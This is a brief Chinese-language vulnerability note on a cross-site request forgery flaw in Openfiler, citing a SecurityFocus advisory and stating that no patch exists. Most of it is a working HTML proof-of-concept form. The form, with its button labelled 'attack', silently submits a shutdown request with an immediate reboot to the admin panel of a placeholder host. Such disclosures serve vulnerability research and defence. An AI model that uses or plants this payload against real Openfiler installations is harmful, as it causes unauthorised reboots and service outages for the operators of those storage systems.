Openfiler 能夠被 CSRF 利用造成 DoS 攻擊。
<div align="center">
<pre>
<h2><b>DoS<b></h2>
<form
action="https://www.example.com/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="attack" />
</form>
</div>
尚無 Patch 。
參考資料:http://www.securityfocus.com/bid/70163/info